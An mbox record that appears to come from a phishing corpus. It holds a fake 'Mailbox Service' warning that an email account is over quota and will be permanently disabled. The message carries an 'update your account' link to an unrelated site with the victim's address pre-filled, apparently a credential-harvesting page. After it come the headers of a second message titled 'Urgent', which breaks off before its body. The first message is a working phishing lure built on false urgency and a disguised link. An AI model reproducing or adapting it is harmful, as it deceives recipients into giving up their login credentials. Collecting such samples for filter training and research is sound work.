From: "Mailbox Service" <test@macrolinkexpress.com>
Date: Sun, 07 Feb 2016 02:33:44 +0200
Message-Id: <20160207002602.ACE6A61C2A3@idb.com.vn>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 60

You will not see this in a MIME-aware mail reader.
--===============0049937346==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 Dear jose@monkey.org, =

 =

   1969MB	  	  	 2000MB
  =

We noticed your e-mail account has almost exceed it's limit. And you may no=
t be able to send or receive messages any moment from now, CLICK HERE TO UP=
DATE YOUR E-MAIL ACCOUNT.    NOTICE:   failure to update your e-mail accoun=
t. It will be permanently disabled.   Thanks, Account Service
--===============0049937346==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV class=3DrcmBody>
<P><SPAN id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2912 class=3Dyiv24862=
92201 style=3D"FONT-SIZE: 12pt; LINE-HEIGHT: 22px"><FONT color=3D#585858>De=
ar <STRONG><FONT color=3D#000000>jose@monkey.org</FONT></STRONG>,</FONT></S=
PAN> </P>
<TABLE id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2893 class=3Dyiv2486292=
201 style=3D"FONT-SIZE: 24px; BACKGROUND-IMAGE: none; BACKGROUND-REPEAT: re=
peat; COLOR: rgb(68,68,68); font-stretch: normal" cellSpacing=3D0 cellPaddi=
ng=3D0 border=3D0>
<TBODY id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2892 class=3Dyiv2486292=
201 style=3D"WIDTH: 293px; LINE-HEIGHT: 21px">
<TR id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2891 class=3Dyiv2486292201>
<TD id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2911 class=3Dyiv2486292201=
 style=3D"BORDER-TOP: black 1pt solid; WIDTH: 131.25pt; BACKGROUND: rgb(255=
,204,0); BORDER-BOTTOM: black 1pt solid; PADDING-BOTTOM: 0in; PADDING-TOP: =
0in; PADDING-LEFT: 0in; BORDER-LEFT: black 1pt solid; BORDER-RIGHT-COLOR: r=
gb(240,240,240); PADDING-RIGHT: 0in" width=3D175><SPAN id=3Dyiv2486292201yu=
i_3_16_0_1_1409874957895_2926 class=3Dyiv2486292201 style=3D"FONT-SIZE: 12p=
t; FONT-FAMILY: Tahoma, sans-serif; COLOR: rgb(34,34,34); LINE-HEIGHT: 22px=
">1969MB</SPAN><SPAN class=3Dyiv2486292201 style=3D"FONT-SIZE: 12pt; COLOR:=
 rgb(34,34,34); LINE-HEIGHT: 22px"></SPAN></TD>
<TD id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2924 class=3Dyiv2486292201=
 style=3D"BORDER-TOP: black 1pt solid; BORDER-RIGHT: black 1pt solid; WIDTH=
: 18.75pt; BORDER-BOTTOM: black 1pt solid; BORDER-LEFT-COLOR: rgb(240,240,2=
40); PADDING-BOTTOM: 0in; PADDING-TOP: 0in; PADDING-LEFT: 0in; PADDING-RIGH=
T: 0in; BACKGROUND-COLOR: transparent" width=3D25><SPAN class=3Dyiv24862922=
01 style=3D"FONT-SIZE: 12pt; COLOR: rgb(34,34,34); LINE-HEIGHT: 22px"></SPA=
N>&nbsp;</TD>
<TD id=3Dyui_3_16_0_1_1410448463373_1911 class=3Dyiv2486292201 style=3D"BOR=
DER-TOP: rgb(240,240,240); BORDER-RIGHT: rgb(240,240,240); BACKGROUND: 0px =
50%; BORDER-BOTTOM: rgb(240,240,240); PADDING-BOTTOM: 0in; PADDING-TOP: 0in=
; PADDING-LEFT: 0in; BORDER-LEFT: rgb(240,240,240); PADDING-RIGHT: 0in" vAl=
ign=3Dtop>&nbsp;</TD>
<TD id=3Dyui_3_16_0_1_1410448463373_1885 class=3Dyiv2486292201 style=3D"BOR=
DER-TOP: rgb(240,240,240); BORDER-RIGHT: rgb(240,240,240); BACKGROUND: 0px =
50%; BORDER-BOTTOM: rgb(240,240,240); PADDING-BOTTOM: 0in; PADDING-TOP: 0in=
; PADDING-LEFT: 0in; BORDER-LEFT: rgb(240,240,240); PADDING-RIGHT: 0in"><B =
id=3Dyui_3_16_0_1_1410448463373_1884 class=3Dyiv2486292201><SPAN id=3Dyui_3=
_16_0_1_1410448463373_1886 class=3Dyiv2486292201 style=3D"FONT-SIZE: 12pt; =
FONT-FAMILY: Tahoma, sans-serif; COLOR: rgb(34,34,34); LINE-HEIGHT: 22px">2=
000</SPAN></B><SPAN id=3Dyui_3_16_0_1_1410448463373_1913 class=3Dyiv2486292=
201 style=3D"FONT-SIZE: 12pt; FONT-FAMILY: Tahoma, sans-serif; COLOR: rgb(3=
4,34,34); LINE-HEIGHT: 22px">MB</SPAN><SPAN class=3Dyiv2486292201 style=3D"=
FONT-SIZE: 12pt; COLOR: rgb(34,34,34); LINE-HEIGHT: 22px"></SPAN></TD></TR>=
</TBODY></TABLE>
<DIV class=3Dyiv2486292201></DIV>
<DIV id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2909 class=3Dyiv248629220=
1 style=3D"FONT-SIZE: 24px; COLOR: rgb(68,68,68); font-stretch: normal"><SP=
AN id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2907 class=3Dyiv2486292201 =
style=3D"FONT-SIZE: 12pt; LINE-HEIGHT: 22px"><FONT color=3D#4d4d4d><BR>We n=
oticed your e-mail account has almost exceed it's limit. </FONT></SPAN><FON=
T color=3D#4d4d4d size=3D3><SPAN>And you may not be able to send or receive=
 messages any moment from now,</SPAN></FONT></DIV>
<DIV id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2906 class=3Dyiv248629220=
1 style=3D"FONT-SIZE: 24px; COLOR: rgb(68,68,68); font-stretch: normal"><SP=
AN><A id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2903 title=3D"" class=3D=
yiv2486292201 style=3D"BACKGROUND-IMAGE: none; BACKGROUND-REPEAT: repeat; B=
ACKGROUND-ATTACHMENT: scroll; BACKGROUND-POSITION: 0% 0%; COLOR: rgb(34,34,=
34); OUTLINE-WIDTH: medium; OUTLINE-COLOR: invert" href=3D"http://cartageno=
wwireless.com/admin/FILES/index.php?email=3Djose@monkey.org" target=3D_blan=
k><SPAN id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2902 class=3Dyiv248629=
2201 style=3D"COLOR: rgb(0,104,207)"><FONT color=3D#4d4d4d size=3D3>CLICK H=
ERE TO&nbsp;UPDATE YOUR E-MAIL ACCOUNT.</FONT></SPAN></A><FONT color=3D#4d4=
d4d size=3D3>&nbsp;</FONT></SPAN></DIV>
<DIV class=3Dyiv2486292201 style=3D"FONT-SIZE: 24px; COLOR: rgb(68,68,68); =
font-stretch: normal"><SPAN><FONT color=3D#4d4d4d size=3D3></FONT></SPAN>&n=
bsp;</DIV>
<DIV class=3Dyiv2486292201 style=3D"FONT-SIZE: 24px; COLOR: rgb(68,68,68); =
font-stretch: normal"><SPAN><FONT color=3D#4d4d4d size=3D3><STRONG><U>NOTIC=
E:</U>&nbsp; </STRONG></FONT></SPAN></DIV>
<DIV class=3Dyiv2486292201 style=3D"FONT-SIZE: 24px; COLOR: rgb(68,68,68); =
font-stretch: normal"><SPAN><FONT color=3D#4d4d4d size=3D3>failure to updat=
e your e-mail account. It&nbsp;will be permanently disabled.</FONT></SPAN><=
/DIV>
<DIV class=3Dyiv2486292201 style=3D"FONT-SIZE: 24px; COLOR: rgb(68,68,68); =
font-stretch: normal"><SPAN><FONT color=3D#4d4d4d size=3D3></FONT></SPAN>&n=
bsp;</DIV>
<DIV id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2898 class=3Dyiv248629220=
1 style=3D"FONT-SIZE: 24px; COLOR: rgb(68,68,68); font-stretch: normal"><SP=
AN class=3Dyiv2486292201 style=3D"FONT-SIZE: 12pt; LINE-HEIGHT: 22px"><FONT=
 color=3D#4d4d4d>Thanks,</FONT></SPAN></DIV>
<DIV id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2900 class=3Dyiv248629220=
1 style=3D"FONT-SIZE: 24px; COLOR: rgb(68,68,68); font-stretch: normal"><SP=
AN id=3Dyiv2486292201yui_3_16_0_1_1409874957895_2901 class=3Dyiv2486292201 =
style=3D"FONT-SIZE: 12pt; LINE-HEIGHT: 22px"><FONT color=3D#4d4d4d>Account =
Service</FONT></SPAN></DIV></DIV></BODY></HTML>
--===============0049937346==--

From jose@monkey.org Wed Feb 10 20:58:59 2016 +0000
Return-Path: marijke@sales.co.za
Delivered-To: jose@monkey.org
X-FDA: 71173755198.21.steam90_88ace0a9ca409
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 30,2,0,39ae2e6c1fd1b708,d41d8cd98f00b204,marijke@sales.co.za,:marijke@sales.co.za,RULES_HIT:41:72:152:355:379:474:962:967:978:983:988:989:1032:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1534:1537:1559:1575:1588:1592:1594:1711:1714:1730:1748:1777:1792:2525:2560:2563:2682:2685:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3866:3867:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:5007:6261:6687:7980:9025:9059:9060:9388:9411:9416:9873:9908:10004:10049:10346:10394:10400:11658:11815:11914:12043:12050:12306:12561:13110:13235:13237:14036:21080:21324,0,RBL:196.11.146.227:@sales.co.za:.lbl8.mailshell.net-62.8.247.100 66.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:12,LUA_SUMMARY:none
X-HE-Tag: steam90_88ace0a9ca409
X-Filterd-Recvd-Size: 2316
Received: from vodamail.co.za (relay2.vodamail.co.za [196.11.146.227])
	by imf17.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 10 Feb 2016 20:58:58 +0000 (UTC)
Received: from vodamail.co.za (smtp7.vodamail.internal [10.113.154.86])
	by relay2.vodamail.internal (Postfix) with ESMTP id 0A0C59276FE;
	Wed, 10 Feb 2016 22:58:58 +0200 (SAST)
Received: from localhost (localhost [127.0.0.1])
	by smtp7.vodamail.co.za (Postfix) with ESMTP id 214928116658;
	Wed, 10 Feb 2016 22:58:57 +0200 (SAST)
X-Virus-Scanned: amavisd-new at vodamail.co.za
Received: from vodamail.co.za ([127.0.0.1])
	by localhost (smtp7.vodamail.internal [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id D4629Fl5Ev-5; Wed, 10 Feb 2016 22:58:53 +0200 (SAST)
Received: from Play.www.huaweimobilewifi.com (unknown [41.13.2.117])
	by smtp7.vodamail.co.za (Postfix) with ESMTP id 78DAC8187AF6;
	Wed, 10 Feb 2016 22:58:47 +0200 (SAST)
Content-Type: multipart/alternative; boundary="===============1721596980=="
MIME-Version: 1.0
Subject: Urgent
To: Recipients <marijke@sales.co.za>
